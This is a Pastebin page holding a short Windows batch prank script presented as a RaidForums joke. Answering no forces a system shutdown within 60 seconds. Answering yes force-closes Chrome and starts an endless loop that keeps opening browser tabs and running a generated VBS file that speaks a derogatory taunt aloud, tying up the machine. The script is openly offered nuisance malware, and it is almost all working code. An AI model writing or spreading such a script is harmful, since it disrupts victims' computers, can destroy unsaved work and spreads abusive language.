Advertisement
Guest User

Welcome to RF.cmd

a guest
Aug 15th, 2015
314
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.89 KB | None | 0 0
  1. @echo off
  2. color a
  3. echo Welcome to RaidForums haxing for skids
  4. SET /P ANSWER=Do you want to enter the world of dank memes and fun(Y/N)?
  5. echo You chose: %ANSWER%
  6. if /i {%ANSWER%}=={y} (goto :yes)
  7. if /i {%ANSWER%}=={yes} (goto :yes)
  8. goto :no
  9.  
  10. :no
  11. echo You pressed no!
  12. shutdown -s -t 60
  13. exit
  14.  
  15. :yes
  16. echo Welcome skid!
  17. start chrome www.youtube.com/watch?v=_pMS51DEpzE
  18. timeout /t 82 /nobreak
  19. Taskkill /F /IM chrome.exe
  20. start chrome https://www.youtube.com/watch?v=zbIlKoyoFgE
  21. start chrome http://www.pcr-online.biz/cimages/de8185a48895c11dfea668a73a4bbe27.jpg
  22.  
  23. :loop
  24. start chrome http://www.pcr-online.biz/cimages/de8185a48895c11dfea668a73a4bbe27.jpg
  25. echo set speech = Wscript.CreateObject("SAPI.spVoice") >> "temp.vbs"
  26. set text=Burn all the Newfags
  27. echo speech.speak "%text%" >> "temp.vbs"
  28. start temp.vbs
  29. timeout /t 0 /nobreak
  30. del temp.vbs
  31. goto loop
  32.  
  33.  
  34.  
  35.  
  36.  
  37.  
  38.  
  39.  
  40.  
  41.  
  42.  
  43. cmd /k
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement